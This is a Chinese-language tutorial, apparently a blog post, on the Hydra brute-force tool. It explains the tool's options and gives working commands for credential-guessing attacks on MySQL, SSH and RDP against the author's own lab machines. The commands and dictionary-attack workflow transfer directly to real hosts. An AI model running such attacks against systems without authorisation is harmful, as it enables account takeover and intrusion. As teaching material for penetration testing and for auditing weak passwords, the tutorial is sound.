目录
Hydra初识
Hydra使用
hydra破解mysql
前言
不固定用户名密码爆破
hydra破解ssh
以用户名为密码登录
hydra破解rdp
将爆破密码的结果输出到文件中
Hydra初识
前言:
- hydra是一款开源的暴力破解工具,支持多种服务破解
- 原理:使用户字典文件的内容与密码字典文件的内容一一做碰撞
Hydra使用
语法:hydra [options] IP地址 服务名
options
- -l 用户名:指定登录的用户名
- -L 用户名密码字典:指定用户名字典
- -p 密码:指定密码
- -P 密码字典:指定密码字典
- -o 文件名:输出文件
- -s port:指定端口
- -t n:指定线程数为n(n越大破解越快,破解精度越低)
- -e n/s/r:n尝试空密码,s以用户名为密码,r用户名反向为密码
- -vV:显示详细过程(可以看见电脑尝试密码过程)
- -f:在找到第一对登陆用户名和密码时停止
注意:用户名,用户名密码字典以及密码,密码字典只能各存在一个
| 服务名 | 端口 |
| mysql | 3306 |
| ssh | 22 |
| ftp | 21 |
| rdp | 3389 |
注意:这个端口只是举例,其是默认端口
查看帮助文档:hydra -h
hydra破解mysql
前言
- mysql服务器所在的ip:192.168.1.2
- 事先准备好用户字典和密码字典(用户名文件有对应的用户名,密码文件有该用户名对应的密码)
- 事先确保3306端口的开启,没开启开防火墙(用nmap检测)
- 事先设置好mysql数据库的远程连接和mysql密码允许失败次数
不固定用户名密码爆破
语法:hydra -L username.txt -P password.txt 192.168.1.2 mysql -f
注意:
- 也可以指定用户名,密码用密码字典或指定密码,用户名用用户字典来爆破
- 字典文件可以用相对路径也可以用绝对路径(我上面用的是相对路径)
hydra破解ssh
前言:我的centos虚拟机IP地址为——192.168.1.35
语法:hydra -l root -P password.txt -s 22 192.168.1.35 ssh -t 4 -vV
注意:一般用ssh服务的22端口连接服务器。
以用户名为密码登录
前言:因为我已经知道用户名密码是一样的,那么干脆趁现在测试一下-e参数
语法:hydra -l root -e s -s 22 192.168.1.35 ssh -vV
注意:这里的用户名也可以用字典文件
命令:hydra -L username.txt -e s -s 22 192.168.1.35 ssh -vV
hydra破解rdp
前言:
- 我的win10的rdp服务为192.168.1.7,端口为:3389
- 事先要配置允许远程桌面进行连接
语法:hydra -l lili -P password.txt -s 3389 192.168.1.7 rdp
将爆破密码的结果输出到文件中
语法:hydra -l root -P password.txt 192.168.1.2 mysql -o mima.txt
解释:将mysql服务破解的用户名和密码输出到mima.txt文件中
